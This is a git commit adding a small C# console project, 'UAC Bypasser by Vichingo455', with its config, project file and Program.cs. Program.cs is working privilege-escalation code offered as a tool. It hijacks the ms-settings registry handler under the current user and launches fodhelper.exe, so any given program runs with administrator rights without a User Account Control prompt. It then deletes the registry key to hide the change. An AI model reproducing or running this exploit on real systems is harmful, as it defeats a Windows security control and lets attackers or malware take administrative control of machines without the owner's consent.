Upload files to "Bypass-UAC"

This commit is contained in:
Vichingo455 2024-12-05 17:53:10 +00:00
parent de0a3c0562
commit e8e30971a9
3 changed files with 162 additions and 0 deletions

6
Bypass-UAC/App.config Normal file
View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6"/>
</startup>
</configuration>

View File

@ -0,0 +1,80 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{9E093A9D-5A9C-4141-ACB3-4DB650D9B65F}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>Bypass_UAC</RootNamespace>
<AssemblyName>Bypass-UAC</AssemblyName>
<TargetFrameworkVersion>v4.6</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
<TargetFrameworkProfile />
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup>
<StartupObject />
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Deployment" />
<Reference Include="System.Drawing" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<EmbeddedResource Include="Properties\Resources.resx">
<Generator>ResXFileCodeGenerator</Generator>
<LastGenOutput>Resources.Designer.cs</LastGenOutput>
<SubType>Designer</SubType>
</EmbeddedResource>
<Compile Include="Properties\Resources.Designer.cs">
<AutoGen>True</AutoGen>
<DependentUpon>Resources.resx</DependentUpon>
<DesignTime>True</DesignTime>
</Compile>
<None Include="Properties\Settings.settings">
<Generator>SettingsSingleFileGenerator</Generator>
<LastGenOutput>Settings.Designer.cs</LastGenOutput>
</None>
<Compile Include="Properties\Settings.Designer.cs">
<AutoGen>True</AutoGen>
<DependentUpon>Settings.settings</DependentUpon>
<DesignTimeSharedInput>True</DesignTimeSharedInput>
</Compile>
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

76
Bypass-UAC/Program.cs Normal file
View File

@ -0,0 +1,76 @@
using System;
using System.Diagnostics;
using System.Reflection;
using System.Security.Principal;
using Microsoft.Win32;
using System.IO;
namespace Bypass_UAC
{
internal static class Program
{
/// <summary>
/// Punto di ingresso principale dell'applicazione.
/// </summary>
[STAThread]
static void Main(string[] switches)
{
Console.Title = "UAC Bypasser by Vichingo455";
if (!File.Exists(@"C:\Windows\System32\fodhelper.exe"))
{
Console.WriteLine("This program requires NT 10.0 (Windows 10) or higher! Operation aborted");
Console.ReadKey();
Environment.Exit(-1);
}
else
{
if (switches.Length == 1)
{
string arg = switches[0].Trim();
if (File.Exists(arg))
{
WindowsPrincipal pricipal = new WindowsPrincipal(WindowsIdentity.GetCurrent());
bool hasAdministrativeRight = pricipal.IsInRole(WindowsBuiltInRole.Administrator);
if (!hasAdministrativeRight)
{
try
{
RegistryKey rk;
rk = Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Classes\ms-settings\shell\open\command");
rk.SetValue("", arg, RegistryValueKind.String);
rk.SetValue("DelegateExecute", "", RegistryValueKind.String);
Process.Start(@"C:\Windows\System32\fodhelper.exe").WaitForExit();
rk.Close();
rk = Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Classes");
rk.DeleteSubKeyTree("ms-settings");
rk.Close();
Environment.Exit(0);
}
catch (Exception ex)
{
Console.WriteLine("An exception occured: " + ex.Message);
Console.ReadKey();
Environment.Exit(-1);
}
}
else
{
Process.Start(arg);
}
}
else
{
Console.WriteLine($"The file {arg} specified in the argument is not valid! Operation Aborted!");
Console.ReadKey();
Environment.Exit(-1);
}
}
else
{
Console.WriteLine(@"You need to specify the file path, for example C:\Windows\System32\cmd.exe. Operation Aborted!");
Console.ReadKey();
Environment.Exit(-1);
}
}
}
}
}